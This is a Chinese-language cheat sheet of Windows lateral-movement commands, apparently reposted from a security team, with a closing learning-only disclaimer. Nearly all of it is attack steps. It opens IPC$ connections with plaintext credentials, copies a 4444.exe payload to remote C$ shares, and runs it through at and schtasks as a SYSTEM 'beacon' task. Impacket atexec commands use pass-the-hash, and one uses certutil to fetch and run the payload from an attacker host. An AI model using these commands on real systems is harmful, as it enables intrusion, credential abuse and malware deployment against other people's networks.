net use # 查看IPC连接
net use \\server\ipc$ /del # 删除IPC连接
net use \\server ip\ipc$ "password" /user:username #工作组
net use \\server ip\ipc$ "password" /user:domain\username #域内主机
dir \\server ip\c$\
copy \\server ip\c$\1.ext 1.exe # 下载文件
copy 1.bat \\server ip\c$ # 上传文件
type \\192.168.3.32\c$\ip.txt
net use \\192.168.3.21\ipc$ "Admin12345" /user:administrator
copy 4444.exe \\192.168.3.21\c$\
dir \\192.168.3.21\c$
net time \\192.168.3.21 # 查看目标系统时间
at \192.168.3.21 16:40 C:\4444.exe # 使用at计划任务执行C盘下的4444.exe
at \\192.168.3.21 1 # 查看at id=1 的计划任务
at \\192.168.3.21 1 /delete # 删除at id=1 的计划任务
net use \\192.168.3.32 "[email protected]#45" /user:administrator
copy 4444.exe \\192.168.3.32\c$
dir \\192.168.3.32\c$
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn beacon /sc DAILY /tr c:\4444.exe /F # 创建beacon任务对应执行文件,每天运行一次
schtasks /run /s 192.168.3.32 /tn beacon /i # 运行beacon服务
schtasks /query | findstr beacon # 查看beacon计划任务
schtasks /delete /s 192.168.3.32 /tn beacon /f # 删除beacon计划任务
atexec.exe ./administrator:[email protected] "whoami" # 本地用户明文连接执行命令
atexec.exe god/administrator:[email protected] "whoami" #域内用户明文连接执行命令
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "whoami" # 使用hash进行本地用户连接
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] "whoami" # 使用hash进行域内用户连接
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "certutil.exe -urlcache -split -f http://192.168.3.31:80/4444.exe 4444.exe"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "dir | findstr 4444.exe"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "4444.exe"
python atexec.py .\administrator:[email protected] "whoami" # 本地明文建立IPC连接并执行命令
python atexec.py god\administrator:[email protected] "whoami" # 域内主机建立IPC连接并执行命令
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "whoami"#本地用户使用hash进行IPC连接
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] "whoami"#本地用户使用hash进行IPC连接
文章来源:tide安全团队
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看多一条小鱼干